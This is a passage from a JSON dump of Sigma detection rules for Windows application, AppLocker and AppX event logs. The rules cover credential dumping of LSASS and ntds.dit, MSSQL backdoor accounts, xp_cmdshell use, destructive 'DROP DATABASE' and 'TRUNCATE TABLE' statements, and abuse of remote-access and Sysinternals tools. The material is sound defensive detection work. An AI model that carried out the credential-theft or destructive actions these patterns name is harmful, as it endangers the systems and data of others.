    "content": "title: LSASS Process Crashed - Application\nid: a18e0862-127b-43ca-be12-1a542c75c7c5\nstatus: experimental\ndescription: |\n    Detects Windows error reporting events where the process that crashed is LSASS (Local Security Authority Subsystem Service).\n    This could be the cause of a provoked crash by techniques such as Lsass-Shtinkering to dump credentials.\nreferences:\n    - https://github.com/deepinstinct/Lsass-Shtinkering\n    - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-07\nmodified: 2025-12-03\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        Provider_Name: 'Application Error'\n        EventID: 1000\n        AppName: 'lsass.exe'\n        ExceptionCode: 'c0000001' # STATUS_UNSUCCESSFUL\n    condition: selection\nfalsepositives:\n    - Rare legitimate crashing of the lsass process\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/application_error/win_application_error_msmpeng_crash.yml",
    "content": "title: Microsoft Malware Protection Engine Crash\nid: 545a5da6-f103-4919-a519-e9aec1026ee4\nrelated:\n    - id: 6c82cf5c-090d-4d57-9188-533577631108\n      type: similar\nstatus: test\ndescription: This rule detects a suspicious crash of the Microsoft Malware Protection Engine\nreferences:\n    - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5\n    - https://technet.microsoft.com/en-us/library/security/4022344\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-05-09\nmodified: 2023-04-14\ntags:\n    - attack.defense-evasion\n    - attack.t1211\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name: 'Application Error'\n        EventID: 1000\n        Data|contains|all:\n            - 'MsMpEng.exe'\n            - 'mpengine.dll'\n    condition: selection\nfalsepositives:\n    - MsMpEng might crash if the \"C:\\\" partition is full\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse.yml",
    "content": "title: Ntdsutil Abuse\nid: e6e88853-5f20-4c4a-8d26-cd469fd8d31f\nstatus: test\ndescription: Detects potential abuse of ntdsutil to dump ntds.dit database\nreferences:\n    - https://twitter.com/mgreen27/status/1558223256704122882\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-14\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name: 'ESENT'\n        EventID:\n            - 216\n            - 325\n            - 326\n            - 327\n        Data|contains: 'ntds.dit'\n    condition: selection\nfalsepositives:\n    - Legitimate backup operation/creating shadow copies\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml",
    "content": "title: Dump Ntds.dit To Suspicious Location\nid: 94dc4390-6b7c-4784-8ffc-335334404650\nstatus: test\ndescription: Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location\nreferences:\n    - https://twitter.com/mgreen27/status/1558223256704122882\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-14\nmodified: 2023-10-23\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection_root:\n        Provider_Name: 'ESENT'\n        EventID: 325 # New Database Created\n        Data|contains: 'ntds.dit'\n    selection_paths:\n        Data|contains:\n            # Add more locations that you don't use in your env or that are just suspicious\n            - ':\\ntds.dit'\n            - '\\Appdata\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Perflogs\\'\n            - '\\Temp\\'\n            - '\\Users\\Public\\'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate backup operation/creating shadow copies\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml",
    "content": "title: Audit CVE Event\nid: 48d91a3a-2363-43ba-a456-ca71ac3da5c2\nstatus: test\ndescription: |\n    Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\n    MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\n    Unfortunately, that is about the only instance of CVEs being written to this log.\nreferences:\n    - https://twitter.com/VM_vivisector/status/1217190929330655232\n    - https://twitter.com/DidierStevens/status/1217533958096924676\n    - https://twitter.com/FlemmingRiis/status/1217147415482060800\n    - https://www.youtube.com/watch?v=ebmW42YYveI # \"CVEs in Windows Event Logs? What You Need to Know\" by 13Cubed.\n    - https://nullsec.us/windows-event-log-audit-cve/\nauthor: Florian Roth (Nextron Systems), Zach Mathis\ndate: 2020-01-15\nmodified: 2022-10-22\ntags:\n    - attack.execution\n    - attack.t1203\n    - attack.privilege-escalation\n    - attack.t1068\n    - attack.defense-evasion\n    - attack.t1211\n    - attack.credential-access\n    - attack.t1212\n    - attack.lateral-movement\n    - attack.t1210\n    - attack.impact\n    - attack.t1499.004\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        Provider_Name:\n            - 'Microsoft-Windows-Audit-CVE'\n            - 'Audit-CVE'\n        EventID: 1\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml",
    "content": "title: Backup Catalog Deleted\nid: 9703792d-fd9a-456d-a672-ff92efe4806a\nstatus: test\ndescription: Detects backup catalog deletions\nreferences:\n    - https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx\n    - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100\nauthor: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)\ndate: 2017-05-12\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        EventID: 524\n        Provider_Name: Microsoft-Windows-Backup\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml",
    "content": "title: Restricted Software Access By SRP\nid: b4c8da4a-1c12-46b0-8a2b-0a8521d03442\nstatus: test\ndescription: Detects restricted access to applications by the Software Restriction Policies (SRP) policy\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv\nauthor: frack113\ndate: 2023-01-12\ntags:\n    - attack.lateral-movement\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1072\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        Provider_Name: 'Microsoft-Windows-SoftwareRestrictionPolicies'\n        EventID:\n            - 865 # Access to %1 has been restricted by your Administrator by the default software restriction policy level\n            - 866 # Access to %1 has been restricted by your Administrator by location with policy rule %2 placed on path %3.\n            - 867 # Access to %1 has been restricted by your Administrator by software publisher policy.\n            - 868 # Access to %1 has been restricted by your Administrator by policy rule %2.\n            - 882 # Access to %1 has been restricted by your Administrator by policy rule %2.\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/msiinstaller/win_builtin_remove_application.yml",
    "content": "title: Application Uninstalled\nid: 570ae5ec-33dc-427c-b815-db86228ad43e\nstatus: test\ndescription: An application has been removed. Check if it is critical.\nreferences:\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/Microsoft-Windows-MsiServer.xml\n    - https://learn.microsoft.com/en-us/windows/win32/msi/event-logging\nauthor: frack113\ndate: 2022-01-28\nmodified: 2022-09-17\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        Provider_Name: 'MsiInstaller'\n        EventID:\n            - 1034 # Windows Installer removed the product\n            - 11724 # Product Removal Successful\n    condition: selection\nfalsepositives:\n    - Unknown\n# Level is low as it can be very verbose, you can use the top or less 10 \"Product Name\" to have a quick overview\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml",
    "content": "title: MSI Installation From Suspicious Locations\nid: c7c8aa1c-5aff-408e-828b-998e3620b341\nstatus: test\ndescription: Detects MSI package installation from suspicious locations\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-31\nmodified: 2023-10-23\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name: 'MsiInstaller'\n        EventID:\n            - 1040\n            - 1042\n        Data|contains:\n            # Add more suspicious paths\n            - ':\\Windows\\TEMP\\'\n            - '\\\\\\\\'\n            - '\\Desktop\\'\n            - '\\PerfLogs\\'\n            - '\\Users\\Public\\'\n            # - '\\AppData\\Local\\Temp\\'  # too many FPs\n            # - '\\Downloads\\'  # too many FPs, typical legitimate staging directory\n    filter_winget:\n        Data|contains: '\\AppData\\Local\\Temp\\WinGet\\'\n    filter_updhealthtools:\n        Data|contains: 'C:\\Windows\\TEMP\\UpdHealthTools.msi'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares. A baseline is required before production use.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/application/msiinstaller/win_msi_install_from_web.yml",
    "content": "title: MSI Installation From Web\nid: 5594e67a-7f92-4a04-b65d-1a42fd824a60\nstatus: test\ndescription: Detects installation of a remote msi file from web.\nreferences:\n    - https://twitter.com/_st0pp3r_/status/1583922009842802689\nauthor: Stamatis Chatzimangou\ndate: 2022-10-23\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1218.007\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name: 'MsiInstaller'\n        EventID:\n            - 1040\n            - 1042\n        Data|contains: '://'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml",
    "content": "title: Atera Agent Installation\nid: 87261fb2-69d0-42fe-b9de-88c6b5f65a43\nstatus: test\ndescription: Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators\nreferences:\n    - https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent\nauthor: Bhabesh Raj\ndate: 2021-09-01\nmodified: 2022-12-25\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    service: application\n    product: windows\ndetection:\n    selection:\n        EventID: 1033\n        Provider_Name: MsiInstaller\n        Message|contains: AteraAgent\n    condition: selection\nfalsepositives:\n    - Legitimate Atera agent installation\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml",
    "content": "title: MSSQL Add Account To Sysadmin Role\nid: 08200f85-2678-463e-9c32-88dce2f073d1\nstatus: test\ndescription: Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role\nreferences:\n    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-13\nmodified: 2024-06-26\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    service: application\n    definition: 'Requirements: MSSQL audit policy must be enabled in order to receive this event in the application log'\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876\n        EventID: 33205\n        Data|contains|all:\n            - 'object_name:sysadmin'\n            - 'statement:alter server role [sysadmin] add member '\n    condition: selection\nfalsepositives:\n    - Rare legitimate administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/mssqlserver/win_mssql_destructive_query.yml",
    "content": "title: MSSQL Destructive Query\nid: 00321fee-ca72-4cce-b011-5415af3b9960\nstatus: experimental\ndescription: |\n    Detects the invocation of MS SQL transactions that are destructive towards table or database data, such as \"DROP TABLE\" or \"DROP DATABASE\".\nreferences:\n    - https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-table-transact-sql?view=sql-server-ver16\n    - https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-database-transact-sql?view=sql-server-ver16\n    - https://learn.microsoft.com/en-us/sql/t-sql/statements/truncate-table-transact-sql?view=sql-server-ver16\nauthor: Daniel Degasperi '@d4ns4n_'\ndate: 2025-06-04\ntags:\n    - attack.exfiltration\n    - attack.impact\n    - attack.t1485\nlogsource:\n    product: windows\n    service: application\n    definition: 'Requirements: MSSQL audit policy must be enabled in order to receive this event (event id 33205)'\ndetection:\n    selection:\n        Provider_Name: 'MSSQLSERVER$AUDIT'\n        EventID: 33205\n        Data|contains:\n            - 'statement:TRUNCATE TABLE'\n            - 'statement:DROP TABLE'\n            - 'statement:DROP DATABASE'\n    condition: selection\nfalsepositives:\n    - Legitimate transaction from a sysadmin.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml",
    "content": "title: MSSQL Disable Audit Settings\nid: 350dfb37-3706-4cdc-9e2e-5e24bc3a46df\nstatus: test\ndescription: Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server\nreferences:\n    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/\n    - https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16\n    - https://learn.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-13\nmodified: 2024-06-26\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: application\n    definition: 'Requirements: MSSQL audit policy must be enabled in order to receive this event in the application log'\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876\n        EventID: 33205\n        Data|contains:\n            - 'statement:ALTER SERVER AUDIT'\n            - 'statement:DROP SERVER AUDIT'\n    condition: selection\nfalsepositives:\n    - This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/mssqlserver/win_mssql_failed_logon.yml",
    "content": "title: MSSQL Server Failed Logon\nid: 218d2855-2bba-4f61-9c85-81d0ea63ac71\nrelated:\n    - id: ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d\n      type: similar\nstatus: test\ndescription: Detects failed logon attempts from clients to MSSQL server.\nreferences:\n    - https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/\n    - https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html\nauthor: Nasreddine Bencherchali (Nextron Systems), j4son\ndate: 2023-10-11\nmodified: 2024-06-26\ntags:\n    - attack.credential-access\n    - attack.t1110\nlogsource:\n    product: windows\n    service: application\n    definition: 'Requirements: Must enable MSSQL authentication.'\ndetection:\n    selection:\n        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876\n        EventID: 18456\n    condition: selection\nfalsepositives:\n    - This event could stem from users changing an account's password that's used to authenticate via a job or an automated process. Investigate the source of such events and mitigate them\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml",
    "content": "title: MSSQL Server Failed Logon From External Network\nid: ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d\nrelated:\n    - id: 218d2855-2bba-4f61-9c85-81d0ea63ac71\n      type: similar\nstatus: test\ndescription: Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack.\nreferences:\n    - https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/\n    - https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html\nauthor: j4son\ndate: 2023-10-11\nmodified: 2025-05-28\ntags:\n    - attack.credential-access\n    - attack.t1110\nlogsource:\n    product: windows\n    service: application\n    definition: 'Requirements: Must enable MSSQL authentication.'\ndetection:\n    selection:\n        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876\n        EventID: 18456\n    filter_main_local_ips:\n        Data|contains:\n            - 'CLIENT: 10.' # filter_range_IP: 10.0.0.0/8\n            - 'CLIENT: 172.16.' # filter_range_IP: 172.16.0.0/12\n            - 'CLIENT: 172.17.'\n            - 'CLIENT: 172.18.'\n            - 'CLIENT: 172.19.'\n            - 'CLIENT: 172.20.'\n            - 'CLIENT: 172.21.'\n            - 'CLIENT: 172.22.'\n            - 'CLIENT: 172.23.'\n            - 'CLIENT: 172.24.'\n            - 'CLIENT: 172.25.'\n            - 'CLIENT: 172.26.'\n            - 'CLIENT: 172.27.'\n            - 'CLIENT: 172.28.'\n            - 'CLIENT: 172.29.'\n            - 'CLIENT: 172.30.'\n            - 'CLIENT: 172.31.'\n            - 'CLIENT: 192.168.' # filter_range_IP: 192.168.0.0/16\n            - 'CLIENT: 127.' # filter_loop_back: 127.0.0.0/8\n            - 'CLIENT: 169.254.' # fileter_link-local_addressing: 169.254.0.0/16\n            - 'CLIENT: <local machine>'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml",
    "content": "title: MSSQL SPProcoption Set\nid: b3d57a5c-c92e-4b48-9a79-5f124b7cf964\nstatus: test\ndescription: Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started\nreferences:\n    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/\n    - https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-13\nmodified: 2024-06-26\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    service: application\n    definition: 'Requirements: MSSQL audit policy to monitor for \"sp_procoption\" must be enabled in order to receive this event in the application log'\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876\n        EventID: 33205\n        Data|contains|all:\n            - 'object_name:sp_procoption'\n            - 'statement:EXEC'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the feature by administrators (rare)\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml",
    "content": "title: MSSQL XPCmdshell Suspicious Execution\nid: 7f103213-a04e-4d59-8261-213dddf22314\nstatus: test\ndescription: Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands\nreferences:\n    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/\n    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-12\nmodified: 2024-06-26\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    service: application\n    definition: 'Requirements: MSSQL audit policy to monitor for \"xp_cmdshell\" must be enabled in order to receive this event in the application log (Follow this tutorial https://dba.stackexchange.com/questions/103183/is-there-any-way-to-monitor-execution-of-xp-cmdshell-in-sql-server-2012)'\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876\n        EventID: 33205\n        Data|contains|all:\n            # You can modify this to include specific commands\n            - 'object_name:xp_cmdshell'\n            - 'statement:EXEC'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml",
    "content": "title: MSSQL XPCmdshell Option Change\nid: d08dd86f-681e-4a00-a92c-1db218754417\nstatus: test\ndescription: |\n    Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed.\nreferences:\n    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/\n    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-12\nmodified: 2024-06-26\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876\n        EventID: 15457\n        Data|contains: 'xp_cmdshell'\n    condition: selection\nfalsepositives:\n    - Legitimate enable/disable of the setting\n    - Note that since the event contain the change for both values. This means that this will trigger on both enable and disable\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml",
    "content": "title: Remote Access Tool - ScreenConnect Command Execution\nid: 076ebe48-cc05-4d8f-9d41-89245cd93a14\nrelated:\n    - id: b1f73849-6329-4069-bc8f-78a604bb8b23\n      type: similar\nstatus: test\ndescription: Detects command execution via ScreenConnect RMM\nreferences:\n    - https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling\n    - https://github.com/SigmaHQ/sigma/pull/4467\nauthor: Ali Alwashali\ndate: 2023-10-10\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    service: application\n    product: windows\ndetection:\n    selection:\n        Provider_Name: 'ScreenConnect'\n        EventID: 200\n        Data|contains: 'Executed command of length'\n    condition: selection\nfalsepositives:\n    - Legitimate use of ScreenConnect\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml",
    "content": "title: Remote Access Tool - ScreenConnect File Transfer\nid: 5d19eb78-5b5b-4ef2-a9f0-4bfa94d58a13\nrelated:\n    - id: b1f73849-6329-4069-bc8f-78a604bb8b23\n      type: similar\nstatus: test\ndescription: Detects file being transferred via ScreenConnect RMM\nreferences:\n    - https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling\n    - https://github.com/SigmaHQ/sigma/pull/4467\nauthor: Ali Alwashali\ndate: 2023-10-10\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    service: application\n    product: windows\ndetection:\n    selection:\n        Provider_Name: 'ScreenConnect'\n        EventID: 201\n        Data|contains: 'Transferred files with action'\n    condition: selection\nfalsepositives:\n    - Legitimate use of ScreenConnect\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/application/windows_error_reporting/win_application_msmpeng_crash_wer.yml",
    "content": "title: Microsoft Malware Protection Engine Crash - WER\nid: 6c82cf5c-090d-4d57-9188-533577631108\nstatus: test\ndescription: This rule detects a suspicious crash of the Microsoft Malware Protection Engine\nreferences:\n    - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5\n    - https://technet.microsoft.com/en-us/library/security/4022344\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-05-09\nmodified: 2023-04-14\ntags:\n    - attack.defense-evasion\n    - attack.t1211\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name: 'Windows Error Reporting'\n        EventID: 1001\n        Data|contains|all:\n            - 'MsMpEng.exe'\n            - 'mpengine.dll'\n    condition: selection\nfalsepositives:\n    - MsMpEng might crash if the \"C:\\\" partition is full\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/applocker/win_applocker_application_was_prevented_from_running.yml",
    "content": "title: AppLocker Prevented Application or Script from Running\nid: 401e5d00-b944-11ea-8f9a-00163ecd60ae\nstatus: test\ndescription: |\n    Detects when AppLocker prevents the execution of an Application, DLL, Script, MSI, or Packaged-App from running.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/what-is-applocker\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/using-event-viewer-with-applocker\n    - https://nxlog.co/documentation/nxlog-user-guide/applocker.html\nauthor: Pushkarev Dmitry\ndate: 2020-06-28\nmodified: 2025-12-03\ntags:\n    - attack.execution\n    - attack.t1204.002\n    - attack.t1059.001\n    - attack.t1059.003\n    - attack.t1059.005\n    - attack.t1059.006\n    - attack.t1059.007\nlogsource:\n    product: windows\n    service: applocker\ndetection:\n    selection:\n        EventID:\n            - 8004 # EXE and DLL\n            - 8007 # MSI and Script\n            - 8022 # Packaged app execution\n            - 8025 # Packaged app deployment\n    condition: selection\nfalsepositives:\n    - Unlikely, since this event notifies about blocked application execution. Tune your applocker rules to avoid blocking legitimate applications.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml",
    "content": "title: Sysinternals Tools AppX Versions Execution\nid: d29a20b2-be4b-4827-81f2-3d8a59eab5fc\nstatus: test\ndescription: |\n    Detects execution of Sysinternals tools via an AppX package.\n    Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths.\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/microsoft-store\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-16\nmodified: 2023-09-12\ntags:\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    product: windows\n    service: appmodel-runtime\ndetection:\n    selection:\n        EventID: 201\n        ImageName:\n            - 'procdump.exe'\n            - 'psloglist.exe'\n            - 'psexec.exe'\n            - 'livekd.exe'\n            - 'ADExplorer.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of sysinternals applications from the Windows Store will trigger this. Apply exclusions as needed.\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_applocker_block.yml",
    "content": "title: Deployment AppX Package Was Blocked By AppLocker\nid: 6ae53108-c3a0-4bee-8f45-c7591a2c337f\nstatus: test\ndescription: Detects an appx package deployment that was blocked by AppLocker policy.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv\nauthor: frack113\ndate: 2023-01-11\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID: 412\n    condition: selection\nfalsepositives:\n    - Unlikely, since this event notifies about blocked application deployment. Tune your applocker rules to avoid blocking legitimate applications.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_appx_downloaded_from_file_sharing_domains.yml",
